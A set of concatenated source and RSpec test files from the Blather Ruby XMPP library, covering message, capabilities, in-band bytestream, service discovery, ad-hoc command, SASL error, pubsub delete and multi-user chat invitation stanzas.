expect(Blather::Stanza::Message.new).to respond_to :"#{valid_type}?"
end
end
it 'ensures an html node exists when asked for xhtml_node' do
search_args = [
'/message/html_ns:html',
{:html_ns => Blather::Stanza::Message::HTML_NS}
]
msg = Blather::Stanza::Message.new
expect(msg.find_first(*search_args)).to be_nil
msg.xhtml_node
expect(msg.find_first(*search_args)).not_to be_nil
end
it 'ensures a body node exists when asked for xhtml_node' do
search_args = [
'/message/html_ns:html/body_ns:body',
{:html_ns => Blather::Stanza::Message::HTML_NS,
:body_ns => Blather::Stanza::Message::HTML_BODY_NS}
]
msg = Blather::Stanza::Message.new
expect(msg.find_first(*search_args)).to be_nil
msg.xhtml_node
expect(msg.find_first(*search_args)).not_to be_nil
end
it 'returns an existing node when asked for xhtml_node' do
msg = Blather::Stanza::Message.new
msg << (h = Blather::XMPPNode.new('html', msg.document))
h.namespace = Blather::Stanza::Message::HTML_NS
b = Blather::XMPPNode.new('body', msg.document)
b.namespace = Blather::Stanza::Message::HTML_BODY_NS
h << b
expect(msg.xhtml_node).to eq(b)
end
it 'has an xhtml setter' do
msg = Blather::Stanza::Message.new
xhtml = "<some>xhtml</some>"
msg.xhtml = xhtml
expect(msg.xhtml_node.inner_html.strip).to eq(xhtml)
end
it 'sets valid xhtml even if the input is not valid' do
msg = Blather::Stanza::Message.new
xhtml = "<some>xhtml"
msg.xhtml = xhtml
expect(msg.xhtml_node.inner_html.strip).to eq("<some>xhtml</some>")
end
it 'sets xhtml with more than one root node' do
msg = Blather::Stanza::Message.new
xhtml = "<i>xhtml</i> more xhtml"
msg.xhtml = xhtml
expect(msg.xhtml_node.inner_html.strip).to eq("<i>xhtml</i> more xhtml")
end
it 'has an xhtml getter' do
msg = Blather::Stanza::Message.new
xhtml = "<some>xhtml</some>"
msg.xhtml = xhtml
expect(msg.xhtml).to eq(xhtml)
end
it 'finds xhtml body when html wrapper has wrong namespace' do
msg = Blather::XMPPNode.parse(ichat_message_xml)
expect(Nokogiri::XML(msg.xhtml).to_xml).to eq(Nokogiri::XML("<span style=\"font-family: 'Arial';font-size: 12px;color: #262626;\">Hello</span>\n <img alt=\"f5ad3a04d218d7160fa02415e02d41b3.jpg\" src=\"message-attachments:1\" width=\"30\" height=\"30\"></img>").to_xml)
end
it 'has a chat state setter' do
msg = Blather::Stanza::Message.new
msg.chat_state = :composing
expect(msg.xpath('ns:composing', :ns => Blather::Stanza::Message::CHAT_STATE_NS)).not_to be_empty
end
it 'will only add one chat state at a time' do
msg = Blather::Stanza::Message.new
msg.chat_state = :composing
msg.chat_state = :paused
expect(msg.xpath('ns:*', :ns => Blather::Stanza::Message::CHAT_STATE_NS).size).to eq(1)
end
it 'ensures chat state setter accepts strings' do
msg = Blather::Stanza::Message.new
msg.chat_state = "gone"
expect(msg.xpath('ns:gone', :ns => Blather::Stanza::Message::CHAT_STATE_NS)).not_to be_empty
end
it 'ensures chat state is one of Blather::Stanza::Message::VALID_CHAT_STATES' do
expect do
msg = Blather::Stanza::Message.new
msg.chat_state = :invalid_chat_state
end.to raise_error(Blather::ArgumentError)
Blather::Stanza::Message::VALID_CHAT_STATES.each do |valid_chat_state|
msg = Blather::Stanza::Message.new
msg.chat_state = valid_chat_state
expect(msg.chat_state).to eq(valid_chat_state)
end
end
it 'has a chat state getter' do
msg = Blather::Stanza::Message.new
msg.chat_state = :paused
expect(msg.chat_state).to eq(:paused)
end
it 'imports correct chat state' do
expect(Blather::XMPPNode.parse(message_xml).chat_state).to eq(:paused)
end
it 'makes a form child available' do
n = Blather::XMPPNode.parse(message_xml)
expect(n.form.fields.size).to eq(1)
expect(n.form.fields.map { |f| f.class }.uniq).to eq([Blather::Stanza::X::Field])
expect(n.form).to be_instance_of Blather::Stanza::X
r = Blather::Stanza::Message.new
r.form.type = :form
expect(r.form.type).to eq(:form)
end
it 'ensures the form child is a direct child' do
r = Blather::Stanza::Message.new
r.form
expect(r.xpath('ns:x', :ns => Blather::Stanza::X.registered_ns)).not_to be_empty
end
it 'is not delayed' do
n = Blather::XMPPNode.parse(message_xml)
expect(n.delay).to eq(nil)
expect(n.delayed?).to eq(false)
end
describe "with a delay" do
it "is delayed" do
n = Blather::XMPPNode.parse(delayed_message_xml)
expect(n.delayed?).to eq(true)
expect(n.delay).to be_instance_of Blather::Stanza::Message::Delay
expect(n.delay.from).to eq('<EMAIL>')
expect(n.delay.stamp).to eq(Time.utc(2002, 10, 13, 23, 58, 37, 0))
expect(n.delay.description).to eq("Too slow")
end
end
end
<file_sep>/lib/blather/stanza/presence/c.rb
module Blather
class Stanza
class Presence
# # Entity Capabilities Stanza
#
# [XEP-0115 - Entity Capabilities](http://http://xmpp.org/extensions/xep-0115.html)
#
# Blather handles c nodes through this class. It provides a set of helper methods
# to quickly deal with capabilites presence stanzas.
#
# @handler :c
class C < Presence
register :c, :c, 'http://jabber.org/protocol/caps'
# @private
VALID_HASH_TYPES = %w[md2 md5 sha-1 sha-224 sha-256 sha-384 sha-512].freeze
def self.new(node = nil, ver = nil, hash = 'sha-1')
new_node = super()
new_node.c
new_node.hash = hash
new_node.node = node
new_node.ver = ver
parse new_node.to_xml
end
module InstanceMethods
# @private
def inherit(node)
c.remove
super
self
end
# Get the name of the node
#
# @return [String, nil]
def node
c[:node]
end
# Set the name of the node
#
# @param [String, nil] node the new node name
def node=(node)
c[:node] = node
end
# Get the name of the hash
#
# @return [Symbol, nil]
def hash
c[:hash] && c[:hash].to_sym
end
# Set the name of the hash
#
# @param [String, nil] hash the new hash name
def hash=(hash)
if hash && !VALID_HASH_TYPES.include?(hash.to_s)
raise ArgumentError, "Invalid Hash Type (#{hash}), use: #{VALID_HASH_TYPES*' '}"
end
c[:hash] = hash
end
# Get the ver
#
# @return [String, nil]
def ver
c[:ver]
end
# Set the ver
#
# @param [String, nil] ver the new ver
def ver=(ver)
c[:ver] = ver
end
# C node accessor
# If a c node exists it will be returned.
# Otherwise a new node will be created and returned
#
# @return [Blather::XMPPNode]
def c
unless c = find_first('ns:c', :ns => C.registered_ns)
self << (c = XMPPNode.new('c', self.document))
c.namespace = self.class.registered_ns
end
c
end
end
include InstanceMethods
end # C
end #Presence
end #Stanza
end
<file_sep>/spec/blather/stanza/iq/ibb_spec.rb
require 'spec_helper'
def ibb_open_xml
<<-XML
<iq from='<EMAIL>/orchard'
id='jn3h8g65'
to='<EMAIL>/balcony'
type='set'>
<open xmlns='http://jabber.org/protocol/ibb'
block-size='4096'
sid='i781hf64'
stanza='iq'/>
</iq>
XML
end
def ibb_data_xml
<<-XML
<iq from='<EMAIL>/orchard'
id='kr91n475'
to='<EMAIL>/balcony'
type='set'>
<data xmlns='http://jabber.org/protocol/ibb' seq='0' sid='i781hf64'>
qANQR1DBwU4DX7jmYZnncmUQB/9KuKBddzQH+tZ1ZywKK0yHKnq57kWq+RFtQdCJ
WpdWpR0uQsuJe7+vh3NWn59/gTc5MDlX8dS9p0ovStmNcyLhxVgmqS8ZKhsblVeu
IpQ0JgavABqibJolc3BKrVtVV1igKiX/N7Pi8RtY1K18toaMDhdEfhBRzO/XB0+P
AQhYlRjNacGcslkhXqNjK5Va4tuOAPy2n1Q8UUrHbUd0g+xJ9Bm0G0LZXyvCWyKH
kuNEHFQiLuCY6Iv0myq6iX6tjuHehZlFSh80b5BVV9tNLwNR5Eqz1klxMhoghJOA
</data>
</iq>
XML
end
def ibb_close_xml
<<-XML
<iq from='<EMAIL>/orchard'
id='us71g45j'
to='<EMAIL>/balcony'
type='set'>
<close xmlns='http://jabber.org/protocol/ibb' sid='i781hf64'/>
</iq>
XML
end
describe Blather::Stanza::Iq::Ibb::Open do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:open, 'http://jabber.org/protocol/ibb')).to eq(Blather::Stanza::Iq::Ibb::Open)
end
it 'can be imported' do
node = Blather::XMPPNode.parse ibb_open_xml
expect(node).to be_instance_of Blather::Stanza::Iq::Ibb::Open
end
it 'has open node' do
node = Blather::XMPPNode.parse ibb_open_xml
expect(node.open).to be_kind_of Nokogiri::XML::Element
end
it 'can get sid' do
node = Blather::XMPPNode.parse ibb_open_xml
expect(node.sid).to eq('i781hf64')
end
it 'deleted open node on reply' do
node = Blather::XMPPNode.parse ibb_open_xml
reply = node.reply
expect(reply.open).to be_nil
end
end
describe Blather::Stanza::Iq::Ibb::Data do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:data, 'http://jabber.org/protocol/ibb')).to eq(Blather::Stanza::Iq::Ibb::Data)
end
it 'can be imported' do
node = Blather::XMPPNode.parse ibb_data_xml
expect(node).to be_instance_of Blather::Stanza::Iq::Ibb::Data
end
it 'has data node' do
node = Blather::XMPPNode.parse ibb_data_xml
expect(node.data).to be_kind_of Nokogiri::XML::Element
end
it 'can get sid' do
node = Blather::XMPPNode.parse ibb_data_xml
expect(node.sid).to eq('i781hf64')
end
it 'deleted data node on reply' do
node = Blather::XMPPNode.parse ibb_data_xml
reply = node.reply
expect(reply.data).to be_nil
end
end
describe Blather::Stanza::Iq::Ibb::Close do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:close, 'http://jabber.org/protocol/ibb')).to eq(Blather::Stanza::Iq::Ibb::Close)
end
it 'can be imported' do
node = Blather::XMPPNode.parse ibb_close_xml
expect(node).to be_instance_of Blather::Stanza::Iq::Ibb::Close
end
it 'has close node' do
node = Blather::XMPPNode.parse ibb_close_xml
expect(node.close).to be_kind_of Nokogiri::XML::Element
end
it 'can get sid' do
node = Blather::XMPPNode.parse ibb_close_xml
expect(node.sid).to eq('i781hf64')
end
it 'deleted close node on reply' do
node = Blather::XMPPNode.parse ibb_close_xml
reply = node.reply
expect(reply.close).to be_nil
end
end
<file_sep>/spec/blather/stanza/discos/disco_info_spec.rb
require 'spec_helper'
def disco_info_xml
<<-XML
<iq type='result'
from='<EMAIL>/orchard'
to='<EMAIL>/balcony'
id='info4'>
<query xmlns='http://jabber.org/protocol/disco#info'>
<identity
category='client'
type='pc'
name='Gabber'
xml:lang='en'/>
<feature var='jabber:iq:time'/>
<feature var='jabber:iq:version'/>
</query>
</iq>
XML
end
describe Blather::Stanza::Iq::DiscoInfo do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:query, 'http://jabber.org/protocol/disco#info')).to eq(Blather::Stanza::Iq::DiscoInfo)
end
it 'must be importable' do
expect(Blather::XMPPNode.parse(disco_info_xml)).to be_instance_of Blather::Stanza::Iq::DiscoInfo
end
it 'has a node attribute' do
n = Blather::Stanza::Iq::DiscoInfo.new nil, 'music', [], []
expect(n.node).to eq('music')
n.node = :foo
expect(n.node).to eq('foo')
end
it 'inherits a list of identities' do
n = parse_stanza disco_info_xml
r = Blather::Stanza::Iq::DiscoInfo.new.inherit n.root
expect(r.identities.size).to eq(1)
expect(r.identities.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::DiscoInfo::Identity])
end
it 'inherits a list of features' do
n = parse_stanza disco_info_xml
r = Blather::Stanza::Iq::DiscoInfo.new.inherit n.root
expect(r.features.size).to eq(2)
expect(r.features.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::DiscoInfo::Feature])
end
it 'is constructed properly' do
n = Blather::Stanza::Iq::DiscoInfo.new :get, '/path/to/node'
n.to = '<EMAIL>'
expect(n.find("/iq[@to='<EMAIL>' and @type='get' and @id='#{n.id}']/ns:query[@node='/path/to/node']", :ns => Blather::Stanza::Iq::DiscoInfo.registered_ns)).not_to be_empty
end
it 'allows adding of identities' do
di = Blather::Stanza::Iq::DiscoInfo.new
expect(di.identities.size).to eq(0)
di.identities = [{:name => 'name', :type => 'type', :category => 'category'}]
expect(di.identities.size).to eq(1)
di.identities += [Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category])]
expect(di.identities.size).to eq(2)
di.identities = nil
expect(di.identities.size).to eq(0)
end
it 'allows adding of features' do
di = Blather::Stanza::Iq::DiscoInfo.new
expect(di.features.size).to eq(0)
di.features = ["feature1"]
expect(di.features.size).to eq(1)
di.features += [Blather::Stanza::Iq::DiscoInfo::Feature.new("feature2")]
expect(di.features.size).to eq(2)
di.features = nil
expect(di.features.size).to eq(0)
end
end
describe 'Blather::Stanza::Iq::DiscoInfo identities' do
it 'takes a list of hashes for identities' do
ids = [
{:name => 'name', :type => 'type', :category => 'category'},
{:name => 'name1', :type => 'type1', :category => 'category1'},
]
control = [ Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category]),
Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1])]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, ids
expect(di.identities.size).to eq(2)
di.identities.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a list of Identity objects as identities' do
control = [ Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category]),
Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1])]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, control
expect(di.identities.size).to eq(2)
di.identities.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a single hash as identity' do
control = [Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category])]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, {:name => 'name', :type => 'type', :category => 'category'}
expect(di.identities.size).to eq(1)
di.identities.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a single identity object as identity' do
control = [Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category])]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, control.first
expect(di.identities.size).to eq(1)
di.identities.each { |i| expect(control.include?(i)).to eq(true) }
end
it 'takes a mix of hashes and identity objects as identities' do
ids = [
{:name => 'name', :type => 'type', :category => 'category'},
Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1]),
]
control = [ Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type category]),
Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name1 type1 category1])]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, ids
expect(di.identities.size).to eq(2)
di.identities.each { |i| expect(control.include?(i)).to eq(true) }
end
end
describe 'Blather::Stanza::Iq::DiscoInfo features' do
it 'takes a list of features as strings' do
features = %w[feature1 feature2 feature3]
control = features.map { |f| Blather::Stanza::Iq::DiscoInfo::Feature.new f }
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], features
expect(di.features.size).to eq(3)
di.features.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a list of features as Feature objects' do
features = %w[feature1 feature2 feature3]
control = features.map { |f| Blather::Stanza::Iq::DiscoInfo::Feature.new f }
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], control
expect(di.features.size).to eq(3)
di.features.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a single string' do
control = [Blather::Stanza::Iq::DiscoInfo::Feature.new('feature1')]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], 'feature1'
expect(di.features.size).to eq(1)
di.features.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a single Feature object' do
control = [Blather::Stanza::Iq::DiscoInfo::Feature.new('feature1')]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], control.first
expect(di.features.size).to eq(1)
di.features.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a mixed list of features as Feature objects and strings' do
features = %w[feature1 feature2 feature3]
control = features.map { |f| Blather::Stanza::Iq::DiscoInfo::Feature.new f }
features[1] = control[1]
di = Blather::Stanza::Iq::DiscoInfo.new nil, nil, [], features
expect(di.features.size).to eq(3)
di.features.each { |f| expect(control.include?(f)).to eq(true) }
end
end
describe Blather::Stanza::Iq::DiscoInfo::Identity do
it 'will auto-inherit nodes' do
n = parse_stanza "<identity name='Personal Events' type='pep' category='pubsub' node='publish' xml:lang='en' />"
i = Blather::Stanza::Iq::DiscoInfo::Identity.new n.root
expect(i.name).to eq('Personal Events')
expect(i.type).to eq(:pep)
expect(i.category).to eq(:pubsub)
expect(i.xml_lang).to eq('en')
end
it 'has a category attribute' do
n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
expect(n.category).to eq(:cat)
n.category = :foo
expect(n.category).to eq(:foo)
end
it 'has a type attribute' do
n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
expect(n.type).to eq(:type)
n.type = :foo
expect(n.type).to eq(:foo)
end
it 'has a name attribute' do
n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
expect(n.name).to eq('name')
n.name = :foo
expect(n.name).to eq('foo')
end
it 'has an xml:lang attribute' do
n = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat en])
expect(n.xml_lang).to eq('en')
n.xml_lang = 'de'
expect(n.xml_lang).to eq('de')
end
it 'can determine equality' do
a = Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat])
expect(a).to eq(Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[name type cat]))
expect(a).not_to equal Blather::Stanza::Iq::DiscoInfo::Identity.new(*%w[not-name not-type not-cat])
end
end
describe Blather::Stanza::Iq::DiscoInfo::Feature do
it 'will auto-inherit nodes' do
n = parse_stanza "<feature var='ipv6' />"
i = Blather::Stanza::Iq::DiscoInfo::Feature.new n.root
expect(i.var).to eq('ipv6')
end
it 'has a var attribute' do
n = Blather::Stanza::Iq::DiscoInfo::Feature.new 'var'
expect(n.var).to eq('var')
n.var = :foo
expect(n.var).to eq('foo')
end
it 'can determine equality' do
a = Blather::Stanza::Iq::DiscoInfo::Feature.new('var')
expect(a).to eq(Blather::Stanza::Iq::DiscoInfo::Feature.new('var'))
expect(a).not_to equal Blather::Stanza::Iq::DiscoInfo::Feature.new('not-var')
end
end
<file_sep>/lib/blather/stanza/iq/command.rb
module Blather
class Stanza
class Iq
# # Command Stanza
#
# [XEP-0050 Ad-Hoc Commands](http://xmpp.org/extensions/xep-0050.html)
#
# This is a base class for any command based Iq stanzas. It provides a base set
# of methods for working with command stanzas
#
# @handler :command
class Command < Iq
# @private
VALID_ACTIONS = [:cancel, :execute, :complete, :next, :prev].freeze
# @private
VALID_STATUS = [:executing, :completed, :canceled].freeze
# @private
VALID_NOTE_TYPES = [:info, :warn, :error].freeze
register :command, :command, 'http://jabber.org/protocol/commands'
# Overrides the parent method to ensure a command node is created
#
# @param [:get, :set, :result, :error, nil] type the IQ type
# @param [String] node the name of the node
# @param [:cancel, :execute, :complete, :next, :prev, nil] action the command's action
# @return [Command] a new Command stanza
def self.new(type = :set, node = nil, action = :execute)
new_node = super type
new_node.command
new_node.node = node
new_node.action = action
new_node
end
# Overrides the parent method to ensure the current command node is destroyed
# and the action is set to execute if no action provided
#
# @see Blather::Stanza::Iq#inherit
def inherit(node)
command.remove
super
self.action = :execute unless self.action
self
end
# Overrides the parent method to ensure the reply has no action
#
# @param [Hash] opts options to pass to reply!
# @option opts [Boolean] :remove_children Wether or not to remove child nodes when replying
#
# @return [self]
def reply!(opts = {})
opts = {:remove_children => false}.merge opts
super
self.action = nil
self.command.children.remove
new_sessionid! if !sessionid
self
end
# Command node accessor
# If a command node exists it will be returned.
# Otherwise a new node will be created and returned
#
# @return [Blather::XMPPNode]
def command
c = if self.class.registered_ns
find_first('ns:command', :ns => self.class.registered_ns)
else
find_first('command')
end
unless c
(self << (c = XMPPNode.new('command', self.document)))
c.namespace = self.class.registered_ns
end
c
end
# Get the name of the node
#
# @return [String, nil]
def node
command[:node]
end
# Set the name of the node
#
# @param [String, nil] node the new node name
def node=(node)
command[:node] = node
end
# Get the sessionid of the command
#
# @return [String, nil]
def sessionid
command[:sessionid]
end
# Check if there is a sessionid set
#
# @return [true, false]
def sessionid?
!sessionid.nil?
end
# Set the sessionid of the command
#
# @param [String, nil] sessionid the new sessionid
def sessionid=(sessionid)
command[:sessionid] = Digest::SHA1.hexdigest(sessionid)
end
# Generate a new session ID (SHA-1 hash)
def new_sessionid!
self.sessionid = "commandsession-#{id}"
end
# Get the action of the command
#
# @return [Symbol, nil]
def action
(val = command[:action]) && val.to_sym
end
# Check if the command action is :cancel
#
# @return [true, false]
def cancel?
self.action == :cancel
end
# Check if the command action is :execute
#
# @return [true, false]
def execute?
self.action == :execute
end
# Check if the command action is :complete
#
# @return [true, false]
def complete?
self.action == :complete
end
# Check if the command action is :next
#
# @return [true, false]
def next?
self.action == :next
end
# Check if the command action is :prev
#
# @return [true, false]
def prev?
self.action == :prev
end
# Set the action of the command
#
# @param [:cancel, :execute, :complete, :next, :prev] action the new action
def action=(action)
if action && !VALID_ACTIONS.include?(action.to_sym)
raise ArgumentError, "Invalid Action (#{action}), use: #{VALID_ACTIONS*' '}"
end
command[:action] = action
end
# Get the status of the command
#
# @return [Symbol, nil]
def status
((val = command[:status]) && val.to_sym) || :executing
end
# Check if the command status is :executing
#
# @return [true, false]
def executing?
self.status == :executing
end
# Check if the command status is :completed
#
# @return [true, false]
def completed?
self.status == :completed
end
# Check if the command status is :canceled
#
# @return [true, false]
def canceled?
self.status == :canceled
end
# Set the status of the command
#
# @param [:executing, :completed, :canceled] status the new status
def status=(status)
if status && !VALID_STATUS.include?(status.to_sym)
raise ArgumentError, "Invalid Action (#{status}), use: #{VALID_STATUS*' '}"
end
command[:status] = status
end
# Command actions accessor
# If a command actions element exists it will be returned.
# Otherwise a new actions element will be created and returned
#
# @return [Blather::XMPPNode]
def actions
unless a = self.command.find_first('ns:actions', :ns => self.class.registered_ns)
(self.command << (a = XMPPNode.new('actions', self.document)))
a.namespace = self.command.namespace
end
a
end
# Get the command's allowed actions
#
# @return [Array<Symbol>]
def allowed_actions
([:execute] + actions.children.map { |action| action.name.to_sym }).uniq
end
# Get the primary allowed action
#
# @return [Symbol]
def primary_allowed_action
(actions[:execute] || :execute).to_sym
end
# Set the primary allowed action
#
# This must be one of :prev, :next, :complete or :execute
#
# @param [#to_sym] a the primary allowed action
def primary_allowed_action=(a)
a = a.to_sym
if a && ![:prev, :next, :complete, :execute].include?(a)
raise ArgumentError, "Invalid Action (#{a}), use: #{[:prev, :next, :complete, :execute]*' '}"
end
actions[:execute] = a
end
# Add allowed actions to the command
#
# @param [[:prev, :next, :complete]] allowed_actions the new allowed actions
def allowed_actions=(allowed_actions)
allowed_actions = ([allowed_actions].flatten.map(&:to_sym) + [:execute]).uniq
if (invalid_actions = allowed_actions - VALID_ACTIONS).size > 0
raise ArgumentError, "Invalid Action(s) (#{invalid_actions*' '}), use: #{VALID_ACTIONS*' '}"
end
actions.children.map(&:remove)
allowed_actions.each { |action| actions << XMPPNode.new(action.to_s) }
end
# Remove allowed actions from the command
#
# @param [[:prev, :next, :complete]] disallowed_actions the allowed actions to remove
def remove_allowed_actions!
actions.remove
end
# Command note accessor
# If a command note exists it will be returned.
# Otherwise a new note will be created and returned
#
# @return [Blather::XMPPNode]
def note
unless n = self.command.find_first('ns:note', :ns => self.class.registered_ns)
(self.command << (n = XMPPNode.new('note', self.document)))
n.namespace = self.command.namespace
end
n
end
# Get the note_type of the command
#
# @return [Symbol, nil]
def note_type
(val = note[:type]) && val.to_sym
end
# Check if the command status is :info
#
# @return [true, false]
def info?
self.note_type == :info
end
# Check if the command status is :warn
#
# @return [true, false]
def warn?
self.status == :warn
end
# Check if the command status is :error
#
# @return [true, false]
def error?
self.status == :error
end
# Set the note_type of the command
#
# @param [:executing, :completed, :canceled] note_type the new note_type
def note_type=(note_type)
if note_type && !VALID_NOTE_TYPES.include?(note_type.to_sym)
raise ArgumentError, "Invalid Action (#{note_type}), use: #{VALID_NOTE_TYPES*' '}"
end
note[:type] = note_type
end
# Get the text of the command's note
def note_text
command.content_from('ns:note', ns: self.class.registered_ns)
end
# Set the command's note text
#
# @param [String] note_text the command's new note text
def note_text=(note_text)
note.content = note_text
end
# Returns the command's x:data form child
def form
X.find_or_create command
end
end #Command
end #Iq
end #Stanza
end #Blather
<file_sep>/spec/blather/errors/sasl_error_spec.rb
require 'spec_helper'
def sasl_error_node(err_name = 'aborted')
node = Blather::XMPPNode.new 'failure'
node.namespace = Blather::SASLError::SASL_ERR_NS
node << Blather::XMPPNode.new(err_name, node.document)
node
end
describe Blather::SASLError do
it 'can import a node' do
expect(Blather::SASLError).to respond_to :import
e = Blather::SASLError.import sasl_error_node
expect(e).to be_kind_of Blather::SASLError
end
describe 'each XMPP SASL error type' do
%w[ aborted
incorrect-encoding
invalid-authzid
invalid-mechanism
mechanism-too-weak
not-authorized
temporary-auth-failure
].each do |error_type|
it "handles the name for #{error_type}" do
e = Blather::SASLError.import sasl_error_node(error_type)
expect(e.name).to eq(error_type.gsub('-','_').to_sym)
end
end
end
end
<file_sep>/lib/blather/stanza/pubsub_owner/delete.rb
module Blather
class Stanza
class PubSubOwner
# # PubSubOwner Delete Stanza
#
# [XEP-0060 Section 8.4 Delete a Node](http://xmpp.org/extensions/xep-0060.html#owner-delete)
#
# @handler :pubsub_delete
class Delete < PubSubOwner
register :pubsub_delete, :delete, self.registered_ns
# Create a new delete stanza
#
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
# @param [String] host the host to send the request to
# @param [String] node the name of the node to delete
def self.new(type = :set, host = nil, node = nil)
new_node = super(type, host)
new_node.node = node
new_node
end
# Get the name of the node to delete
#
# @return [String]
def node
delete_node[:node]
end
# Set the name of the node to delete
#
# @param [String] node
def node=(node)
delete_node[:node] = node
end
# Get or create the actual delete node on the stanza
#
# @return [Blather::XMPPNode]
def delete_node
unless delete_node = pubsub.find_first('ns:delete', :ns => self.class.registered_ns)
self.pubsub << (delete_node = XMPPNode.new('delete', self.document))
delete_node.namespace = self.pubsub.namespace
end
delete_node
end
end # Retract
end # PubSub
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/message/muc_user_spec.rb
require 'spec_helper'
def muc_invite_xml
<<-XML
<message
from='<EMAIL>'
id='nzd143v8'
to='<EMAIL>'>
<x xmlns='http://jabber.org/protocol/muc#user'>
<invite to='<EMAIL>' from='<EMAIL>/desktop'>
<reason>
Hey Hecate, this is the place for all good witches!
</reason>
</invite>
<password><PASSWORD></password>
</x>
</message>
XML
end
def muc_decline_xml
<<-XML
<message
from='hecate@shakespeare.lit/broom'
id='jk2vs61v'
to='<EMAIL>'>
<x xmlns='http://jabber.org/protocol/muc#user'>
<decline to='<EMAIL>' from='<EMAIL>'>
<reason>
Sorry, I'm too busy right now.
</reason>
</decline>
</x>
</message>
XML
end
describe 'Blather::Stanza::Message::MUCUser' do
it 'ensures a form node is present on create' do
c = Blather::Stanza::Message::MUCUser.new
expect(c.xpath('ns:x', :ns => Blather::Stanza::Message::MUCUser.registered_ns)).not_to be_empty
end
it 'ensures a form node exists when calling #muc' do
c = Blather::Stanza::Message::MUCUser.new
c.remove_children :x
expect(c.xpath('ns:x', :ns => Blather::Stanza::Message::MUCUser.registered_ns)).to be_empty
expect(c.muc_user).not_to be_nil
expect(c.xpath('ns:x', :ns => Blather::Stanza::Message::MUCUser.registered_ns)).not_to be_empty
end
it 'ensures the message type is :normal' do
m = Blather::Stanza::Message::MUCUser.new
expect(m.normal?).to eq(true)
end
it "must be able to set the password" do
muc_user = Blather::Stanza::Message::MUCUser.new
expect(muc_user.password).to eq(nil)
muc_user.password = '<PASSWORD>'
expect(muc_user.password).to eq('<PASSWORD>')
muc_user.password = '<PASSWORD>'
expect(muc_user.password).to eq('<PASSWORD>')
end
it "should not be an #invite?" do
muc_user = Blather::Stanza::Message::MUCUser.new
expect(muc_user.invite?).to eq(false)
end
describe "with an invite element" do
it "should be an #invite?" do
muc_user = Blather::XMPPNode.parse(muc_invite_xml)
expect(muc_user.invite?).to eq(true)
end
it "should know the invite attributes properly" do
muc_user = Blather::XMPPNode.parse(muc_invite_xml)
expect(muc_user).to be_instance_of Blather::Stanza::Message::MUCUser
invite = muc_user.invite
expect(invite.to).to eq('<EMAIL>')
expect(invite.from).to eq('<EMAIL>/desktop')
expect(invite.reason).to eq('Hey Hecate, this is the place for all good witches!')
expect(muc_user.password).to eq('<PASSWORD>')
end
it "must be able to set the to jid" do
muc_user = Blather::Stanza::Message::MUCUser.new
invite = muc_user.invite
expect(invite.to).to eq(nil)
invite.to = '<EMAIL>'
expect(invite.to).to eq('<EMAIL>')
end
it "must be able to set the from jid" do
muc_user = Blather::Stanza::Message::MUCUser.new
invite = muc_user.invite
expect(invite.from).to eq(nil)
invite.from = '<EMAIL>'
expect(invite.from).to eq('<EMAIL>')
end
it "must be able to set the reason" do
muc_user = Blather::Stanza::Message::MUCUser.new
invite = muc_user.invite
expect(invite.reason).to eq('')
invite.reason = 'Please join'
expect(invite.reason).to eq('Please join')
end
end
describe "with a decline element" do
it "should be an #invite_decline?" do
muc_user = Blather::XMPPNode.parse(muc_decline_xml)
expect(muc_user).to be_instance_of Blather::Stanza::Message::MUCUser
expect(muc_user.invite_decline?).to eq(true)
end
it "should know the decline attributes properly" do
muc_user = Blather::XMPPNode.parse(muc_decline_xml)
decline = muc_user.decline
expect(decline.to).to eq('<EMAIL>')
expect(decline.from).to eq('<EMAIL>')
expect(decline.reason).to eq("Sorry, I'm too busy right now.")
end
it "must be able to set the to jid" do
muc_user = Blather::Stanza::Message::MUCUser.new
decline = muc_user.decline
expect(decline.to).to eq(nil)
decline.to = '<EMAIL>'
expect(decline.to).to eq('<EMAIL>')
end
it "must be able to set the from jid" do
muc_user = Blather::Stanza::Message::MUCUser.new
decline = muc_user.decline
expect(decline.from).to eq(nil)
decline.from = '<EMAIL>'
expect(decline.from).to eq('<EMAIL>')
end
it "must be able to set the reason" do
muc_user = Blather::Stanza::Message::MUCUser.new
decline = muc_user.decline
expect(decline.reason).to eq('')
decline.reason = 'Please join'
expect(decline.reason).to eq('Please join')
